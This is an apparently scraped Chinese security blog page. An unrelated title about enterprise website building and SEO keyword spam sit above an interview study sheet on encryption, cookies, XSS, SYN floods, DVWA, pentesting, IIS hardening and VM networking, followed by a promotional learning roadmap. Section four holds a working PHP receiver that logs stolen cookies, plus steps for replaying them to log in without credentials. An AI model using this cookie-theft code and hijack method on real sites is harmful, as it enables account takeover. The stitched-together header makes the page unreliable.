企业官网建设流程全解析

哪个域名网站好,深圳西乡 网站建设,长沙现在可以自由进出吗,电商在线设计网站本篇文章总结涉及以下几个方面#xff1a; 对称加密非对称加密#xff1f; 什么是同源策略#xff1f; cookie存在哪里#xff1f;可以打开吗 xss如何盗取cookie#xff1f; tcp、udp的区别及tcp三次握手#xff0c;syn攻击#xff1f; 证书要考哪些#xff1f; DVWA是…本篇文章总结涉及以下几个方面对称加密非对称加密什么是同源策略cookie存在哪里可以打开吗xss如何盗取cookietcp、udp的区别及tcp三次握手syn攻击证书要考哪些DVWA是如何搭建的渗透测试的流程是什么xss如何防御IIS服务器应该做哪些方面的保护措施虚拟机的几种连接方式及原理xss有cookie一定可以无用户名密码登录吗一、对称加密非对称加密对称加密加解密用同一密钥密钥维护复杂nn-1/2不适合互联网传输密钥加解密效率高。应用于加密数据。非对称加密公钥推不出私钥每个用户一个非对称密钥对就可以适合于互联网传输公钥但是加密效率低应用于数字签名及加密。二、什么是同源策略为了防止不同域在用户浏览器中彼此干扰浏览器对从不同来源域收到的内容进行隔离。浏览器不允许任何旧有脚本访问一个站点的cookie否则 会话容易被劫持。只有发布cookie的站点能够访问这些cookie只有通过该站点返回的页面所包含或加载的JavaScript才能访问cookie。三、cookie存在哪里可以打开吗C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies工具–文件夹选项–查看–将隐藏被保护的文件的对勾去掉就会看到cookies文件夹。四、xss如何盗取cookie攻击者代码?php $cookie$\_GET\[cookie\]; $timedate(Y-m-d g:i:s); $referergetenv(HTTP\_REFERER); $cookietxtfopen(cookie.txt,a); fwrite($cookietxt,time:.$time. cookie:.$cookie. referer:.$referer.); 注意双引号容易出错 fclose($cookietxt); ?脚本端获取到cookie后用firebug找到cookie新建cookie加入cookie用referer来提交无需输入帐号密码直接登录进去五、tcp、udp的区别及tcp三次握手syn攻击也可参考http://www.cnblogs.com/bizhu/archive/2012/05/12/2497493.html一、tcp、udp区别转TCP的优点可靠稳定TCP的可靠体现在TCP在传递数据之前会有三次握手来建立连接而且在数据传递时有确认、窗口、重传、拥塞控制机制在数据传完后还会断开连接用来节约系统资源。TCP的缺点慢效率低占用系统资源高易被攻击TCP在传递数据之前要先建连接这会消耗时间而且在数据传递时确认机制、重传机制、拥塞控制机制等都会消耗大量的时间而且要在每台设备上维护所有的传输连接事实上每个连接都会占用系统的CPU、内存等硬件资源。而且因为TCP有确认机制、三次握手机制这些也导致TCP容易被人利用实现DOS、DDOS、CC等攻击。UDP的优点快比TCP稍安全UDP没有TCP的握手、确认、窗口、重传、拥塞控制等机制UDP是一个无状态的传输协议所以它在传递数据时非常快。没有TCP的这些机制UDP较TCP被攻击者利用的漏洞就要少一些。但UDP也是无法避免攻击的比如UDP Flood攻击……UDP的缺点不可靠不稳定因为UDP没有TCP那些可靠的机制在数据传递时如果网络质量不好就会很容易丢包。基于上面的优缺点那么什么时候应该使用TCP当对网络通讯质量有要求的时候比如整个数据要准确无误的传递给对方这往往用于一些要求可靠的应用比如HTTP、HTTPS、FTP等传输文件的协议POP、SMTP等邮件传输的协议。在日常生活中常见使用TCP协议的应用如下浏览器用的HTTPFlashFXP用的FTPOutlook用的POP、SMTPPutty用的Telnet、SSHQQ文件传输…………什么时候应该使用UDP当对网络通讯质量要求不高的时候要求网络通讯速度能尽量的快这时就可以使用UDP。比如日常生活中常见使用UDP协议的应用如下QQ语音QQ视频TFTP二、TCP握手协议在TCP/IP协议中TCP协议提供可靠的连接服务采用三次握手建立一个连接。第一次握手建立连接时客户端发送syn包(synj)到服务器并进入SYN_SEND状态等待服务器确认第二次握手服务器收到syn包必须确认客户的SYNackj1同时自己也发送一个SYN包synk即SYNACK包此时服务器进入SYN_RECV状态第三次握手客户端收到服务器的SYNACK包向服务器发送确认包ACK(ackk1)此包发送完毕客户端和服务器进入ESTABLISHED状态完成三次握手。完成三次握手客户端与服务器开始传送数据在上述过程中还有一些重要的概念未连接队列在三次握手协议中服务器维护一个未连接队列该队列为每个客户端的SYN包synj开设一个条目该条目表明服务器已收到SYN包并向客户发出确认正在等待客户的确认包。这些条目所标识的连接在服务器处于Syn_RECV状态当服务器收到客户的确认包时删除该条目服务器进入ESTABLISHED状态。 backlog参数表示未连接队列的最大容纳数目。SYN-ACK 重传次数 服务器发送完SYNACK包如果未收到客户确认包服务器进行首次重传等待一段时间仍未收到客户确认包进行第二次重传如果重传次数超过系统规定的最大重传次数系统将该连接信息从半连接队列中删除。注意每次重传等待的时间不一定相同。半连接存活时间是指半连接队列的条目存活的最长时间也即服务从收到SYN包到确认这个报文无效的最长时间该时间值是所有重传请求包的最长等待时间总和。有时我们也称半连接存活时间为Timeout时间、SYN_RECV存活时间。三、SYN攻击原理SYN攻击属于DOS攻击的一种它利用TCP协议缺陷通过发送大量的半连接请求耗费CPU和内存资源。SYN攻击除了能影响主机外还可以危害路由器、防火墙等网络系统事实上SYN攻击并不管目标是什么系统只要这些系统打开TCP服务就可以实施。从上图可看到服务器接收到连接请求synj将此信息加入未连接队列并发送请求包给客户synk,ackj1此时进入SYN_RECV状态。当服务器未收到客户端的确认包时重发请求包一直到超时才将此条目从未连接队列删除。配合IP欺骗SYN攻击能达到很好的效果通常客户端在短时间内伪造大量不存在的IP地址向服务器不断地发送syn包服务器回复确认包并等待客户的确认由于源地址是不存在的服务器需要不断的重发直至超时这些伪造的SYN包将长时间占用未连接队列正常的SYN请求被丢弃目标系统运行缓慢严重者引起网络堵塞甚至系统瘫痪。六、证书要考哪些信息安全国际第一认证——CISSP信息安全国内认证——CISAW信息安全国内认证——CISP信息安全技术实操认证新贵——SecurityIT审计人员的必备之证——CISA七、DVWA是如何搭建的启动xamppXAMPPApacheMySQLPHPPERL是一个功能强大的建站集成软件包。下的apache中间件和mysql将dvwa放到xampp下的htdocs目录下在浏览器输入http://127.0.0.1/dvwa 即可使用啦还有owasp的漏洞练习平台https://sourceforge.net/projects/owaspbwa/files/八、渗透测试的流程是什么渗透测试流程概述前期交互阶段、情报搜集阶段、威胁建模阶段、漏洞分析阶段、渗透攻击阶段Exploitation、后渗透攻击阶段怎么一直控制维持访问、报告阶段。攻击前网络踩点、网络扫描、网络查点攻击中利用漏洞信息进行渗透攻击、获取权限攻击后后渗透维持攻击、文件拷贝、木马植入、痕迹擦除九、xss如何防御1.对前端输入做过滤和编码比如只允许输入指定类型的字符比如电话号格式注册用户名限制等输入检查需要在服务器端完成在前端完成的限制是容易绕过的对特殊字符进行过滤和转义2.对输出做过滤和编码在变量值输出到前端的HTML时进行编码和转义3.给关键cookie使用http-only十、IIS服务器应该做哪些方面的保护措施1. 保持Windows升级:2. 使用IIS防范工具3. 移除缺省的Web站点4. 如果你并不需要FTP和SMTP服务请卸载它们5. 有规则地检查你的管理员组和服务:6. 严格控制服务器的写访问权限7. 设置复杂的密码8. 减少/排除Web服务器上的共享9. 禁用TCP/IP协议中的NetBIOS:10. 使用TCP端口阻塞11. 仔细检查*.bat和*.exe 文件: 每周搜索一次*.bat12. 管理IIS目录安全:13. 使用NTFS安全:14. 管理用户账户15. 审计你的Web服务器:十一、虚拟机的几种连接方式及原理安装完虚拟机后默认安装了两个虚拟网卡VMnet1和VMnet8其他的未安装当然也可以手动安装其他的。其中VMnet1是host网卡用于host方式连接网络的。VMnet8是NAT网卡用于NAT方式连接网络的。它们的IP地址是随机生成的如果要用虚拟机做实验的话最好将VMnet1到VMnet8的IP地址改掉。习惯上把VMware虚拟网卡使用的网段固定使用如下原则VMnet1对应的网段是192.168.10.0VMnet2对应的网段是192.168.20.0其他的类似。当然平常只是随便用用的就不用改了能上网就行了。VMware网络连接的方式主要有桥接Bridged、NAT、主机网络Host-Only。1. Use bridged networking使用桥接网络说明使用VMnet0虚拟交换机此时虚拟机相当与网络上的一台独立计算机与主机一样拥有一个独立的IP地址其网络拓扑如图1所示使用桥接方式AA1A2B可互访。2. Use network address translationNAT说明使用Vmnet8虚拟交换机此时虚拟机可以通过主机单向网络上的其他工作站其他工作站不能访问虚拟机。其网络拓扑如图2所示使用NAT方式A1A2可以访问B但B不可以访问A1A2。但AA1A2可以互访。3. Use Host-Only networking使用主机网络说明使用Vmnet1虚拟交换机此时虚拟机只能与虚拟机、主机互访。也就是不能上Internet其网络拓扑如图3所示使用Host方式AA1A2可以互访但A1A2不能访问B也不能被B访问。十二、xss有cookie一定可以无用户名密码登录吗基本可以。因为把cookie的值给浏览器浏览器去访问页面会用已有的cookie去访问如果cookie有效就会直接进去。十三、总结网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失